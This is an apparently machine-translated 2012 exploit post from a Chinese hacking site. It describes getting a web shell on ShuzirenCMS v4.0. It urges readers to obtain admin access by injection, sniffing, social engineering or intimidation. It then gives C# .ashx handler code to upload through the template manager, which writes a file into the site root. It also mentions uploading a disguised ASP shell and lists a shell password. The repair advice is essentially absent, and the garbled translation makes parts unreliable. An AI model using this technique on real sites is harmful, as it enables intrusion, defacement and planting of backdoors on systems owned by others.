ShuzirenCMS v4. 0 background Get a Shell and fix-vulnerability warning-the black bar safety net

2012-01-18T00:00:00
ID MYHACK58:62201232930
Type myhack58
Reporter 佚名
Modified 2012-01-18T00:00:00

Description

A simple look under the... Find Asp Php script permission to seal too tightly throughout the website, directory any one not to write~

Test environment/system:

Digital Information Center content management system ShuzirenCMS v4. 0 / Windows

Regardless of your social worker,dig yourself the injection,sniffing,intimidation background the administrator password anyway to backstage privileges...

Login to back office> blog> template Manager> edit

Upload 1. ashx

  1. ashx content:

1.

2. using System;

3. using System. Web;

4. using System. IO;

5. public class Handler : IHttpHandler {

6. public void ProcessRequest (HttpContext context) {

7. context. Response. ContentType = “text/plain”;

8. string show=”Hey web master,Have a nice day o. O? I hope so! HaHa”;

9. StreamWriter file1= File. CreateText(context. Server. MapPath(“4z1. aspx”));

1 0. file1. Write(show);

1 1. file1. Flush();

1 2. file1. Close();

1 3.

1 4. }

1 5.

1 6. public bool IsReusable {

1 7. get {

1 8. return false;

1 9. }

2 0. }

2 1.

2 2. }

2 3.

Copy the code

Access to generate the word path:

http://www.xxx.com /4z1. aspx

Password:

RmB321654897123456789

Another is if the asp permission to write the file

Upload aasasa suffix aspshell

Vulnerability proof:

haha1.jpg

haha2.jpg

Provide repair solutions:

Digital people in our company locally, we notify him... Webmasters note-don't leak background privileges're done.